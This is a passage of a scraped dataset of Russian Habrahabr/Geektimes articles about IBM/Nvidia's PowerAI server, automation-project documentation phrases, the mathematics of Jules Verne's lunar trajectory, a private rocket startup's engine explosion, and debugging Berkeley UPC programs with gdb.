Ну а пока маленький робот передает всем привет! Hello, world! https://t.co/e0tREmTEhn #TJBot pic.twitter.com/V3jOiPwya9 — Maryam Ashoori (@MaryamAshoori) November 9, 2016
| https://geektimes.ru/company/ibm/blog/283666/ |
habrahabr | IBM и Nvidia увеличили скорость глубокого обучения нейронных сетей | ['nvidia', 'сервера', 'нейронные сети', 'платформы'] |
За нейронными сетями — будущее человечества, считают некоторые специалисты. Или, если не всего человечества, то ряда сфер, связанных с информационными технологиями. Компания IBM давно работает... |
За нейронными сетями — будущее человечества, считают некоторые специалисты. Или, если не всего человечества, то ряда сфер, связанных с информационными технологиями. Компания IBM давно работает над созданием эффективной когнитивной системы, способной решать сложные задачи и помогать человеку в поиске решений ряда проблем. Один из важных вопросов — это глубокое обучение нейронных сетей.
Этот процесс должен быть достаточно быстрым, но вместе с тем и эффективным. Корпорация IBM заключила договор с Nvidia о совместном сотрудничестве, которое заключается в разработке программного обеспечения IBM Power AI. Это платформа, работающая на специализированном сервере IBM Power System S822LC на процессорах IBM Power 8. Такая программно-аппаратная платформа, по мнению специалистов, и должна обеспечивать быстрое глубокое обучение современных сетей.
Особенностью сервера Power System S822LC является наличие в нем интерфейса Nvidia NV Link. Этот интерфейс представляет собой средство прямого взаимодействия между CPU и GPU. Из таких серверов участники проекта составили тестовую нейросеть Alex Net, где используется фреймворк Caffe от Berkeley Vision and Learning Center . Кроме Caffe, платформа IBM Power AI включает такие библиотеки, как cuDNN, cuBLAS и NCCL. Caffe — широко используемый фреймворк, который считается одним из наиболее популярных в сфере глубинного обучения нейросистем.
Разработчики утверждают, что производительность новой системы в несколько раз выше производительности других систем, построенных на обычных серверах. Партнеры говорят, что производительность сервера 822LC равна производительности системы X86 архитектуре с восемью графическими адаптерами Nvidia предыдущего поколения — Tesla M40. В целом, сервер S822LC с NVLink может передавать данные примерно в пять раз быстрее, чем аналогичные x86 системы.
Собственно, этот сервер — первая система на Power8, которая поставляется с NVLink. До выхода новинки обмен данных между центральным процессором и GPU был узким местом в интерфейсе PCIe x16 Gen3. Сейчас же все данные находятся в общем пространстве системной памяти, что, можно сказать, облегчает программирование. Конфигурация Power System S822LC
— Процессоры IBM POWER8, стандартно работающие на частоте 2,92 или 3,32 ГГц, с 8 или 10 полностью активированными ядрами;
— До 1024 ГБ оперативной памяти;
— Пять слотов PCIe Gen3, два из которых поддерживают только GPU;
— Два жестких диска с интерфейсом SATA на 1 TB, 7200 об/мин, или два SSD SATA накопителя на 480 (или 960) ГБ;
— Два Compute Intensive Accelerator GPU K80;
— Один передний порт USB 2.0 и один задний порт USB 3.0;
— Два источника питания;
— 19-дюймовое стоечное исполнение высотой 2U;
— Операционные системы:
Ubuntu Server 14.04.5 LTS
Ubuntu Server 16.04.1 LTS
Red Hat Enterprise Linux (RHEL) 7.2
В состав Power AI, помимо всего прочего, входят несколько инструментов глубинного обучения, оптимизированных для новой системы. Например, это научная платформа Torch и библиотека Python. В целом, платформа Power AI может работать как на одном сервере, так и на тысячах машин, ее легко можно масштабировать.
«Power AI упростит глубинное обучение и облегчит работу с другими аналитическими технологиями. Ученые и исследователи получат легко масштабируемую платформу, которую можно развернуть довольно быстро», — заявили разработчики. Они также заявили, что считают новую платформу лучшей в плане создания ИИ-приложений. Она без труда позволяет создавать «интеллектуальных» чат-ботов или же работать с данными статистики для получения обработанных результатов анализа в сжатые сроки.
Свой интерес в том, чтобы опробовать новую платформу, выразили такие организации и проекты, как Human BrainProject , HPC облачный провайдер Nimbix , и турецкий вычислительный центр суперкомпьютеров SC3 Electronics . | https://habrahabr.ru/company/ibm/blog/317554/ |
habrahabr | Цели, задачи и принципы автоматизации | ['управление проектами', 'технический писатель', 'техническое задание', 'ГОСТ', 'коммерческие предложения'] | Работая в компании, которая занимается системной интеграцией, мне приходилось много раз читать и дополнять документы типа ТКП, ТЗ по ГОСТу, Планы приемки и прочее. Проекты по автоматизации... | Работая в компании, которая занимается системной интеграцией, мне приходилось много раз читать и дополнять документы типа ТКП, ТЗ по ГОСТу, Планы приемки и прочее. Проекты по автоматизации предприятий преследовали похожие цели и имели приблизительно одинаковый формат. Одни и те же фразы повторялись из документа в документ.
Я решила собрать самые распространенные фразы, попадавшие в раздел «цели и задачи». И добавить принципы, которых следует придерживаться при формировании решений.
Список не универсальный. Буду рада, если кому-то это поможет при написании документов.
С другой стороны, некоторые принципы, собранные в этом списке — это мое понимание того, к чему должны стремиться как и большие корпорации, так и отдельные команды по разработке продуктов. Ступеньки на пути к информатизации общества.
Я призываю придерживаться многих из этих принципов в своей работе, чтобы держаться некой планки, ниже которой — просто уже не современно быть. Создание единого информационного пространства для взаимодействия участников информационного обмена.
Под эту арку можно поместить все — и B2B, B2C; CRM, ERP системы. А так же системы совместной работы с документами, такие как Office 365, Google Docs и прочие. Если подумать, почтовые сервисы и мессенджеры (Hangouts, Skype, Telegram, Slack...) Централизация управления.
От систем мониторинга состояния серверов для предприятия до пульта управления Умным Домом для личных нужд. Предоставление целостной картины состояния объектов информатизации для облегчения оперативного принятия управленческих решений.
Аналитика, статистика, отчеты. Все, что позволяет данные собирать, обрабатывать и выводить в удобной для восприятия форме. Ускорение информационных потоков.
Может быть достигнуто как увеличением производительности за счет увеличения ресурсов, за счет изменений архитектурно-технических решений, так и за счет сокращения числа логических звеньев цепочки передачи данных (автоматическая обработка вместо ручной на каком-то этапе, например). Оперативное получение актуальной информации.
Push / e-mail / sms уведомления, авто-обновление веб-страниц, подписки на события и многое другое.
При совместной работе с документами или пополнении базы знаний команды разработки / внедрения / сопровождения, стоит отказаться от переписок с просьбой скинуть последнюю версию, ссылку на статью, или отписаться, когда что-то дополнится. Ставьте watch, subscribe и т.п. и читайте почту. Не отнимайте время коллег. Соблюдение текущего законодательства.
Самый остро стоящий в своевременном обществе вопрос… А ведь лет 15 назад под этот пункт подходили только мероприятия, направленные на получение лицензий от ФСБ. Сейчас… Я даже перечислять не стану. Защита данных от несанкционированного доступа, потери и повреждений.
Просто и понятно — ИБ. Управление доступом к информации по ролевой модели.
ИБ. Оптимизация хранения данных для исключения избыточности.
С поправкой на случаи, когда избыточность повышает производительность при поиске. Учет и синхронизация версий документов для повышения эффективности совместной работы.
Как часто вы пересылаете документы, не имеющие финальное состояние, по электронке? Задумайтесь. Возможно, в вашей корпоративной инфраструктуре уже есть решение, позволяющее хранить редактируемые несколькими людьми документы в одном месте. Даже частное лицо обладает широкими (и бесплатными) возможностями по совместной работе с файлами. Старайтесь использовать их постоянно, и забудьте о письмах с аттачами типа «ТЗ на ПродуктИмя.версия31.docx». Исключение дублирования ввода данных для ускорения процессов и предотвращения противоречий / искажений.
Как не стыдно признавать, но очень многие компании до сих пор просят своих клиентов и соискателей заполнять анкеточки, которые высылаются по почте. Минимум треть полей таких анкеточек могла бы быть заполнена автоматически. Сокращение влияние человеческого фактора на функционирование информационных систем.
Защита от дурака, от криворучек и от себя-любимого — автоматизатора. Сокращение непроизводительных затрат рабочего времени сотрудников.
Практически все вышеперечисленное может в конечном итоге избавить человека от рутины. Изменение корпоративной культуры организации.
Изменение происходит, когда внедряется система обучения и оценки персонала, а так же когда попадаются внутренние флудилки, доски объявлений и тому подобное.
Есть еще красивые фразочки? Пишите в комментариях, что я упустила. | https://habrahabr.ru/post/257161/ |
habrahabr | С Земли на Луну. История и математика. Часть 1 | ['математика', 'физика', 'фантастика', 'задача трех тел'] |
Если уходить в историю изучения траекторий полета с Земли на Луну, то необходимо вернуться на полтора века назад, в 1865 год, когда был опубликован новый роман Жюля Верна «С Земли на Луну... |
Если уходить в историю изучения траекторий полета с Земли на Луну, то необходимо вернуться на полтора века назад, в 1865 год, когда был опубликован новый роман Жюля Верна «С Земли на Луну прямым путём за 97 часов 20 минут». Конечно, это была далеко не первая книга, в которой описывался подобный перелет, но это был первый роман, в котором автор решил подойти к описанию путешествия с научных позиций. Причем уровень подготовки данного текста особенно хорошо понятен сейчас, так как впервые не просто было показано космическое путешествие, но и детально проанализированы все нюансы, порой весьма мелкие. Сейчас роман любят критиковать за те ошибки, что допустил автор. Но при таком объеме работы было бы удивительно, если бы там вообще не было ошибок! И сейчас куда больше поражают не его ошибки, а то, в чем он оказался прав. Например, по своей идее системы очистки кислорода как на снаряде Колумбиады, так и на космическом корабле «Союз» очень похожи. Только у Жюля Верна был гидроксид натрия, а сейчас применяют гидроксид лития.
Еще более интересны те моменты, в которых он оказался прав, несмотря на неверные предпосылки. Например, Перельман его критиковал за то, что он привел ошибочные данные по времени перелета с Земли на Луну и даже вынес их в название романа. Математик провел более точные расчеты по указанному методу, получив цифру порядка шести суток, на двое суток больше, чем в романе. И его расчеты, в рамках этого метода, действительно были правильными. Только за четверо суток долететь до Луны действительно можно (собственно, многие аппараты достигали Луны примерно за это время), а вот за шесть суток уже нельзя.Метод расчетов был выбран фантастом неправильно, а цифра получилась верная!
Еще, например, вскоре после выхода романа «Вокруг Луны» многие сомневались в возможности подобной траектории близкого облета Луны под действием только гравитационных сил. Лишь в начале ХХ века, при оценке орбит в системах двойных звезд, действительно была показана возможность существования подобных орбит. Вот что писал английский журнал «Знание» в начале ХХ века в статье «Астрономия у Жюля Верна»: «Кривая, описанная снарядом Ж. Верна, дает повод к весьма интересным вопросам. Она начинается и кончается на Земле и представляет собою замкнутую орбиту снаряда. Такую орбиту должна описывать частица, выброшенная с Земли и подверженная действию только силы земного тяготения. Но под одновременным действием Земли и Луны форма орбиты, очевидно, должна измениться. Это было указано впервые, кажется, Бюрро, исследовавшим различные относящиеся сюда частные случаи. Джордж Дарвин также исследовал подобные случаи. Но лишь недавно была дана общая теория этого вопроса профессором Ф. Р. Мультоном, который доказал существование подобных орбит и нашел необходимые начальные условия их существования. Жюль Верн надолго предвосхитил все эти исследования, и надо, конечно, поставить ему в заслугу убедительную разработку этого вопроса».
Другими словами, задачи, которые попытался решить тогда Жюль Верн, были не просто на переднем крае науки – они часто ставили вопросы, на которые наука тогда не могла дать ответа.
Впрочем, не нужно забывать, что все это он делал не один. При написании всех своих книг автор старался обратиться к специалистам в какой-либо области. Согласно его дневникам, расчеты для перелета с Земли на Луну провел его кузен Анри Гарсе (1815-1871), преподаватель математики в лицее Наполеона (сейчас лицей Генриха IV). Кстати, здесь можете посмотреть его книгу на французском языке, посвященную Космографии Leçons nouvelles de Cosmographie (1854). И его расчеты были достаточно точны. Например, здесь я по данным, приведенным в книге, вычислял точную дату старта экипажа Колумбиады.
Henri Garcet (1815–1871)
Впрочем, мы бы, возможно, так и не узнали про его расчеты, если бы Жюль Верн не поместил их в самое начало книги «Вокруг Луны», использовав их в беседе экипажа снаряда Колумбиады. Пишут, что читатели газеты «Дебаты» от 7 ноября 1869 года были буквально поражены, увидев сложные математические вычисления — в этой газете началась публикация романа.
Вот как была описана математическая модель перелета устами Мишеля Ардана и Барбикена: — А знаешь, Барбикен, о чем я думал всю ночь?
— О чем? — спросил председатель.
— Я все думал о наших кембриджских друзьях. Ты, конечно, заметил, что я ни черта не смыслю в математике. Так вот: я никак не могу понять, каким образом наши ученые в обсерватории могли вычислить скорость, которую должен иметь снаряд, чтобы долететь до Луны.
— Ты хочешь сказать, — перебил Барбикен, — до той нейтральной точки, где силы земного и лунного притяжения одинаковы, потому что с этой точки, которая находится почти на девяти десятых всего расстояния между обеими планетами, снаряд полетит на Луну сам собой, вследствие собственной тяжести.
— Ну да, именно это я и имел в виду, — сказал Мишель.- Но как же все-таки они вычислили эту скорость?
— Ничего нет легче.
— А ты сумел бы сам провести это вычисление?
…
— Да, дорогой друг. Приняв в расчет все известные условия задачи:
расстояние от центра Земли до центра Луны, радиус Земли, массу Земли, массу Луны, я могу с точностью установить начальную скорость нашего снаряда, и при этом с помощью самой простой формулы.
— Какая же это формула?
— А вот увидишь. Но только я не стану вычеркивать кривой, описанной нашим снарядом между Луной и Землей, учитывая их относительное движение вокруг Солнца. Предположим, что обе планеты неподвижны. Этого будет совершенно достаточно.
— Почему же?
— Потому что именно так решаются задачи, называемые «задачами трех тел», интегральный же метод для решения таких задач еще недостаточно разработан.
Через некоторое время была выведена и формула, которая была представлена читателям:
где r-радиус Земли, -расстояние между центрами Земли и Луны, х- расстояние ядра от Земли.V 0 — начальная скорость ядра. V- скорость на расстоянии х.
А перелет выглядел так
Здесь я хотел отметить, что эта формула при указанных начальных данных действительно верна. И действительно точно отображает гравитационное воздействие Земли и Луны на аппарат в любой момент времени. Её достаточно легко вывести исходя из закона сохранения энергии. Вывод формулы Верна-Гарсе Сумма с учетом кинетической и потенциальной энергии выглядит так mv 2 / 2 – γM З m/R З – γM Л m/R Л =const
где m и M З ,M Л – масса снаряда, Земли и Луны,
γ – универсальная гравитационная постоянная, R Л -расстояние до центра Луны, R З -расстояние до центра Земли
Переходим к обозначениям романа. А в правой части берем данные в момент запуска. mv 2 / 2 – γM З m/x– γM Л m/(D-x) = mv 0 2 / 2 – γM З m/r – γM Л m/(d-r)
Сокращаем на m, переносим v 2 / 2 –v 0 2 / 2=γM З /x+ γM Л /(D-x)– γM З /r – γM Л /(d-r)
1/2*(v 2 -v 0 2 )=γM З (1/х-1/r+M Л /M З *1/(d-x)-M Л /M З *1/(d-r))
1/2*(v 2 -v 0 2 )=γM З /r(r/х-1+M Л /M З (r/(d-x)-r/(d-r))
Ну а так как из mg=mγM З /r 2 следует γM З =g*r 2
получаем начальную формулу
1/2*(v 2 -v 0 2 )=gr(r/х-1+M Л /M З (r/(d-x)-r/(d-r))
Так в чем же дело? Проблема в том, что она не учитывает динамики системы. Луна же вращается вокруг Земли со скоростью около 1 км/с. Именно в этом заключается проблема данной задачи. В результате, при попытке перелета по указанной выше схеме, когда станция подлетит к нейтральной точке между Землей и Луной, она вовсе не будет захвачена полем Луны, так как последняя улетит от снаряда со скоростью километр в секунду, и снаряд начнет падать на Землю. Но тогда была надежда, что захват аппарата Луной все-таки произойдет, и подобная схема в первом приближении точно показывает динамику перелета. С легкой руки Жюля Верна подобный метод расчета полета вскоре стал очень популярным. Его стали использовать не только в художественных книжках, но и в серьезных научных работах.
Нужно отметить, что тогда астрономы как раз понимали важность учета динамики. Да и дифференциальные уравнения, учитывающие как гравитацию, так и динамику, тогда могли легко составить. Вот только также никак не удавалось найти простое их решение. Собственно, как сейчас хорошо понятно, задача трех тел не имеет общего аналитического решения.Задачу можно было решить только численно, что означало очень и очень большое количество рутинных вычислений, на которые можно было потратить месяцы или даже годы жизни. На момент опубликования романа подобную задачу решали численным методом всего два раза. Причем первая попытка была более чем за сто лет до публикации романа, в 1759 году.
Известно, что Эдмунд Галлей, составляя каталог комет, заметил, что у нескольких комет, появившихся на небе в разное время, очень похожие параметры. Сверив их, он решил, что это может быть одна и та же комета. Потом ее назовут его именем. Комета Галлея появлялась на небосводе в 1531, 1607 и 1682 годах. То есть период обращения был 75-76 лет, а следующее появление ученый спрогнозировал на 1758 год. И все было бы замечательно, если бы не одно «но»: в расчетное время комета на небе так и не объявилась.
Тогда французский математик Клео решил рассчитать ее траекторию как можно точнее. В том числе, с учетом возмущений ее траектории за счет притяжений Юпитера и Сатурна. Это был очень утомительный и долгий труд, хотя он делал эту работу не один: ему помогали астроном Ж.Лаланд и математик мадам Лепот. Оказалось, что разница с предыдущими оценками периода обращения кометы составляет 618 дней, и она прибудет к своему перигелию 13 апреля 1759 года. С возможной ошибкой на месяц. Оценка оказалась очень точна: комета прошла свой перигелий 12 марта. Это была как победа математиков, так и очень хорошее подтверждение законов Ньютона.
Про этот расчет Лаланд после писал: " Шесть месяцев мы вычисляли с утра и до ночи, иногда даже не отрываясь от еды, и следствием этого было то, что я расстроил свое здоровье на все остальные дни своей жизни. Помощь госпожи Лепот была такова, что без нее мы никогда не осмелились бы предпринять этот громадный труд, состоявший из вычислений расстояния кометы от двух планет — Юпитера и Сатурна — для каждого градуса небесной сферы в течении 150 лет".
Можно посмотреть траекторию кометы Галлея относительно орбит планет
Второй раз подобный метод был применен в 1829 году, опять при расчете траектории кометы Галлея. Оценки дали дату возвращения кометы к Солнцу –15 ноября 1835 года. Комета вернулась 16 ноября, опоздав всего на сутки.
В результате, подобный численный метод доказал свою точность. Но по приведенной выше истории хорошо видно, насколько большая и утомительная работа при этом требовалась. Полгода работы трех математиков ушло на вычисление всего одной траектории с хорошо известными начальными параметрами! А ведь для вычисления траекторий перелета с Земли на Луну нужно было оценить десятки, если не сотни траекторий, с разными начальными параметрами. Иначе никак нельзя получить, скажем, точную скорость, дату старта, характеристики траектории, возможные погрешности, параметры полета станции рядом с Луной и т. д. На это уже могли уйти годы жизни. То есть данный вариант решения считался очень сложным. Особенно для задачи, не имеющей тогда особого практического смысла.
При этом, также тогда была уверенность, что можно найти аналитическое решение задачи трех тел. Хотя бы позволяющее, в первом приближении, оценить параметры перелета.
И метод, предложенный Жюлем Верном, казалось, давал ответ на этот вопрос. Ведь математически, в рамках начальных допущений, он был безупречен. Да, он не учитывал динамику, но тогда многие ожидали, что такое допущение нормально, и реальная траектория движения снаряда с Земли на Луну будет выглядеть как-то так.
Расчет из книги «Космические корабли. (Межпланетные сообщения в фантазиях романистов)» 1928 год
И математическая красота вкупе с большой популярностью романа сыграла злую шутку: по данному методу оценивали перелет практически все пионеры космонавтики – Годдард , Штернфельд , Оберт , Макс Валье и многие другие. Иногда, крайне редко, также оценивали не прямой перелет, а по эллипсу спутника Земли. Но и в этом методе были свои недочеты. Например, и там многие почему-то были уверены, что для достижения Луны достаточно попасть в сферу ее действия; дальше, мол, притяжение Луны должно сделать все остальное. Хотя, как было сказано выше, возможность облета в задаче трех тел уже была доказана.
Хорошей иллюстрацией будет статья Вернера фон Брауна в еженедельнике от 18 октября 1952 года.В ней фон Браун рассказал, как, по его мнению, будет выглядеть экспедиция на Луну.
Саму статью можно скачать здесь
По иллюстрации хорошо видно, что там представлена именно схема Жюля Верна: сначала достижение нейтрального района между Землей и Луной, впоследствии – падение на Луну под действием ее притяжения. Пушка давно заменена на ракету, но основной принцип остался неизменным. Хотя прошла почти сотня лет после опубликования романа.
Но вскоре подход к перелетам с Земли на Луну стал меняться. В том числе, благодаря развитию электронно-вычислительных машин.
Продолжение следует . | https://geektimes.ru/post/283628/ |
habrahabr | Взрыв стартапа | ['lin industrial', 'лин индастриал', 'частная космонавтика', 'ракета', 'ракетные двигатели', 'стартапы'] |
В 44-ю годовщину последнего шага человека по Луне, в московской промзоне прогремел взрыв, который ознаменовал выход на новый уровень частного ракетостроения в России. Частная компания и... |
В 44-ю годовщину последнего шага человека по Луне, в московской промзоне прогремел взрыв, который ознаменовал выход на новый уровень частного ракетостроения в России. Частная компания и сколковский стартап "Лин индастриал" перешла к огневым испытаниям своего первого жидкостного ракетного двигателя. Испытания закончились взрывом, от которого пострадал непричастный человек.
Компания "Лин индастриал" появилась в середине 2014 года. Создана настоящими энтузиастами космонавтики, которые вдохновились успехами западных частников и решили выйти на зарождающийся рынок микроракетных пусков. Сейчас в мире появилось множество мелких и крупных частных проектов, создающих ракеты для запуска микро- и наноспутников на околоземную орбиту. “Лин индастриал” был первой и, фактически, единственной подобной частной инициативой в России. Как у всякого приличного стартапа у "Лин" есть и программа-максимум: план строительства лунной базы "Луна семь" .
Генеральный конструктор компании, инициатор и идейный вдохновитель известен многим как ЖЖ блогер ___lin___ , и редактор журнала “Новости космонавтики” Александр Ильин . Его инженерно-космическое образование помогало писать о космосе, но в какой-то момент он не выдержал и взялся за свой собственный проект. Насчет экономических перспектив микроракет я бы с ним поспорил, но, в конце-концов, с чего-то начинать надо. Кто-то строит микроспутники, кто-то микроракеты.
“Лин” стал резидентом Фонда Сколково, и двинулся по сложному и тернистому пути получения микрогранта Сколково в размере 5 млн руб. По дороге ему повезло: нашелся частный инвестор, правда не из России, а из соседней Беларуси. Сооснователь компании Wargaming Сергей Буркатовский, и давний знакомый, вложил в инициативу Александра несколько миллионов рублей. Для создания первой микроракеты, по расчетам Ильина требуется не меньше 500 млн руб, но первые инвестиции позволили начать практическую деятельность.
Основную разработку назвали “Таймыр”. Это должна быть модульная трехступенчатая ракета, которая, в зависимости от количества боковых ускорителей, смогла бы выводить на низкую околоземную орбиту от 10 до 150 кг груза, по цене $15-20 тыс. Это примерная стоимость за кг выведения на Space Shuttle, но дешевле чем $40 тыс у конкурирующей RocketLab. Микроракеты дороже чем современные попутные пуски на обычных ракетах типа “Союз” или Falcon-9, но их перспективы в удобстве выбора орбиты и даты пуска, и на этом поле ожидается активная конкуренция в будущем.
Инновацией в ракете стало выбранное топливо: жидкостная пара перекись водорода и керосин. Думаю упоминание перекиси водорода заставило вздрогнуть тех, кто немного интересовался историей техники в XX веке. Этот компонент топлива где только ни пытались применить, и почти всегда дело заканчивалось взрывами, жертвами и катастрофами. Последняя крупная жертва перекиси — подводная лодка “Курск”. Но инженеры “Лина” знакомы с историей, поэтому решили использовать концентрацию перекиси не выше 85% — это обещало низкую опасность и достаточно высокие характеристики ракеты. Причина такого выбора еще и конструктивная, обычно для окисления керосина в ракетах используется жидкий кислород, но это криогенный компонент, требующий серьезной заправочной инфраструктуры и металлических ракетных баков. Для снижения массы и удешевления конструкции ракеты инженеры решили остановиться на композитных баках.
В разработке “Таймыра” самым простым показался этап создания электронной системы управления ракетой. С этой целью “Лин” стал запускать по сути любительские ракеты на высоту в несколько сот метров, при этом пытаясь оборудовать их аэродинамическими рулями и контролировать полет.
Для этих пусков использовались твердотопливные двигатели.
Кое-какой прогресс в этом был, через какое-то время ракеты становились больше и сложнее. Дошло до сверхзвуковых пусков и двухступенчатых “летающих стендов”.
Одновременно с этим “Лин”, как сколковский стартап часто светился на различных технологических выставках со своим пластиковым макетом космической ракеты (не в масштабе) и металлическими макетами ракетных двигателей своей разработки.
Но за любительскими пусками пластиковых “карамельных” ракет, выставочной картинкой, фотосессиями и пиаром в СМИ оставалось немало трудностей , на которые не рассчитывали стартаперы увлеченные космосом. Все два с лишним года, до сегодняшнего дня прошли для “Линов” в режиме превозмогания. Александр в своем блоге и страницах соцсетей живописно рассказывал о постоянно сваливающихся проблемах, которые никто не ожидал.
Компания сталкивалась с бесконечными бюрократическими препонами в получении лицензии на космическую деятельность. То есть компания до сих пор юридически не является космической. По сути с 2012 года, когда этот статус получили “Спутникс” и “Даурия Аэроспейс”, ни один частник в России, мечтающий стать космическим, не получил заветной лицензии.
Испытания своего первого жидкостного ракетного двигателя “Атар-100” “Лин индастриал” планировал произвести на испытательном стенде Московского авиационного института . Когда двигатель был готов, МАИ отозвал свое согласие без объяснения причин, и намекая на свои опасения за сохранность стенда.
Согласилось помочь с испытаниями одно из предприятий космической отрасли, но потом тоже передумало.
В это же время возникли большие трудности с поиском полигона для проведения любительского “РакетФеста” . В глазах Александра Ильина всё выглядело словно заговор, направленный конкретно против его стартапа. Кому выгоден его провал? Неужели Роскосмос опасается молодого амбициозного конкурента и строит козни?
Надо сказать, что образ благородного борца с обстоятельствами Александр Ильин с радостью бы принял на себя, но не всё так однозначно. Многие представители отрасли со стороны Роскосмоса отмечали его высокомерие и заносчивость, поэтому, даже если и не ставили палки в колеса сознательно, то и помогать не горели желанием.
Так или иначе “Лину” пришлось заняться изготовлением своего собственного испытательного стенда . Для небольших ракетных двигателей там не такая уж масштабная конструкция, изготовление которой для предприятий Роскосмоса-то вообще детская забава, но для небольшого стартапа это были существенные расходы и потеря времени.
К осени 2016 года разработчики начали т.н. “проливочные испытания”, когда через двигатель и топливные системы проливается обыкновенная дистиллированная вода. Это позволяет проверить готовность топливопроводов, клапанов, насосов. Следующий этап уже огневой.
Конечно, инженерам-энтузиастам, которые два с половиной года шли к своей ракете, не терпелось скорее увидеть первое пламя. Тратить время в бесконечных согласованиях полигонных испытаний никто из них не хотел, причем предыдущий опыт показывал, что такого согласования может вообще не быть. Отказ от варианта “выехать в чистое поле” они объяснили сами: “сейчас зима, а стенд собран на базе обычного автомобильного прицепа, который имеет весьма посредственную проходимость”.
Причины спешки, понятное дело, не только в желании поскорее бахнуть, но и банально финансовые: инвестиции иссякают с каждым днем, нужно демонстрировать результат и прогресс, чтобы рассчитывать на следующий раунд. Подозреваю, что и отчетность в Сколково требовала испытаний для закрытия этапа.
В результате воспользовались предложением знакомого, который знал удобный пустырь в промзоне. Казалось, что в 12 часов ночи, в 15-градусный мороз, в воскресенье на складе лома черных металлов уж точно не найдется посторонних. Сами участники испытаний спрятались за старым грузовиком и ощущали себя в безопасности. С пульта отдали команду пуск…
Что произошло потом точно не известно. По данным СМИ, при взрыве двигателя, один из металлических фрагментов пролетел 20 метров, пробил забор из оцинкованного железа, стену бытовки на соседнем участке и серьезно повредил кистевой сустав находившегося там рабочего. Серьезность повреждения точно не установлена. “МК” сообщал об открытом переломе, LIFE весь день писал про ампутированную конечность. По данным “Лина”, повреждение серьезное, задеты сухожилия, но рука в гипсе и на месте.
Основатели компании уже заявили свою готовность возместить стоимость лечения и выплатить денежную компенсацию, но комментариев самого пострадавшего пока никто не получил. Кроме этого МВД еще не решило что делать с юными и не очень последователями Илона Маска и Сергея Королева, пока с них взяли лишь обязательства помогать следствию.
Очевидно "Лин" увлекся и утратил чувство опасности, без которого нельзя в работе с ракетной техникой. Но несмотря на нарушения техники безопасности, серьезную травму человека, и провал испытаний, будущее “Лин индастриал” еще не определено. Кто-то желает компании скорейшего прекращения существования. Хотя я бы напомнил пересказанную в “Марсианине” историю появления одного из самых сильных подразделений NASA — Jet Propulsion Laboratory : “студенты устроили взрыв в общежитии, но их не наказали, а дали испытательную базу и велели продолжать”. Да и история королёвского ГИРДа не сильно отличается: тоже были гаражи, пустыри, и взрывы экспериментальных двигателей, которые через тридцать лет привели к полету Гагарина.
Думаю Роскосмос без труда бы нашел безопасную площадку для испытаний не только Ильину, но и всем частникам, студентам и энтузиастам, мечтающим о космосе и желающим что-то делать своими руками.
Желающие оказать поддержку "Лин индастриал" могут заглянуть в их магазин и приобрести что-либо из предложенного. Подписаться на их страницу Facebook или Вконтакте чтобы следить за новостями. | https://geektimes.ru/post/283664/ |
habrahabr | Berkeley Unified Parallel C (UPC). Отладка с помощью GNU gdb C debbuger. Стек вызова | ['Berkeley Unified Parallel C', 'UPC', 'инструкция', 'отладка'] | Доброго здравия!
Unified Parallel C (UPC) — это расширение языка C, разработанное для высокопроизводительных вычислений на крупномасштабных параллельных машинах. Язык представляет единую... | Доброго здравия! Unified Parallel C (UPC) — это расширение языка C, разработанное для высокопроизводительных вычислений на крупномасштабных параллельных машинах. Язык представляет единую программную модель для систем с общей и разделенной памятью. Количество параллелизма фиксируется на старте программы, обычно с одним потоком на ядро процессора.
» Официальный сайт UPC
» Официальный сайт Berkeley UPC
В прошлой статье Установка в среде Windows и Linux описано, как выполнить установку UPC, но остался не раскрытым важный вопрос использования отладки. Очень часто наступает крах программы, если где-то неправильно выделена память или происходит превышение размерности массива *** Caught a fatal signal: SIGSEGV(11) on node 0/1
NOTICE: Before reporting bugs, run with GASNET_BACKTRACE=1 in the environment to generate a backtrace.
Ошибка сегментирования (слепок снят)
Что можно сделать в данной ситуации, чтобы бы сузить место поиска? Об этом в текущей статье.
Долгое время я избегал изучение отладки, т.к. уже нужно было заняться программированием. Вместо отладки я достаточно подробно логировал через printf действия каждого потока. Однако, дело омрачается тем, что программа UPC переводится на С и в общем случае оказывается не интерпретируемой. Если какая-то строчка была успешно выполнена (по логам), а следующего лога не произошло, то не факт, что ошибка между логируемыми строками! Очень часто ошибка «будущего» влияет на текущую ситуацию и вызывает крах программы совсем в другом месте.
Если в порядке с английским, полную информацию по отладке можно найти на официальной странице Debugging Berkeley UPC applications .
Если у вас есть почтовый ящик в домене университета, то вы можете запросить студенческую лицензию рекомендуемого TotalView, если нет, то можно воспользоваться штатным отладчиком С.
Нужно обратить внимание, что после перевода на С функция main() превратится в user_main().
Первое, чтобы воспользоваться специальным режимом отладки, необходимо запускать upcc c параметром -g . Это означает, что будет запускаться специальная конфигурация UPC из подпапки dbg. Чтобы была возможность увидеть конкретные строки кода, необходимо сохранить во время компиляции временные файлы с исходниками с помощью параметра -save-temps : upcc ./Pack_Polycubes.upc -o Pack_Polycubes -pthreads <b>-save-temps -g</b>
Существует несколько точек входа в отладку. Можно остановить поток с определенным номером с помощью параметра -freeze[=<thread_id>] , а можно просто остановиться по ошибке с помощью -freeze-on-error : upcrun -n 1 -freeze-on-error ./Pack_Polycubes — WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING
This application was built from a Berkeley UPC installation that
was configured and built with these optional features enabled:
debugging tracing statistical collection debugging malloc
This usually has a SERIOUS impact on performance, so you should NOT
trust any performance numbers reported in this program run!!!
To suppress this message, pass '-quiet' to the upcrun command or set
the UPC_NO_WARN or UPC_QUIET environment variables.
— UPCR: UPC thread 0 of 1 on Rosa-VB (pshm node 0 of 1, process 0 of 1, pid=31257)
Hello, I am 0 of 1.
…
*** Caught a fatal signal: SIGSEGV(11) on node 0/1
Process frozen for debugger: host=Rosa-VB pid=31257
To unfreeze, attach a debugger and set 'gasnet_frozen' to 0, or send a SIGCONT
Далее необходимо запустить gdb еще в одном сеансе консоли из папки с выходными файлами компиляции и указать PID потока gdb Pack_Polycubes.o 31257 GNU gdb (Linaro GDB) 7.7.1_2014.06_1-10 ()
Copyright © 2014 Free Software Foundation, Inc.
…
Loaded symbols for /lib64/ld-linux-x86-64.so.2
0x00007f0afab16cd0 in __nanosleep_nocancel () from /lib64/libc.so.6
Чтобы продолжить выполнение программы, необходимо выполнить следующий код: (gdb) set gasnet_frozen = 0
(gdb) continue
Программа услужливо сообщает строчку с ошибкой: Program received signal SIGSEGV, Segmentation fault.
0x00000000004289f8 in MultiplyMatrixPackSpace (Result=0x26274ac, Matrix=0x2696340, CurPackSpace=0x7ffd81634020)
at ./Pack_Polycubes.upc:1065
1065 Result[row][col] = 0;
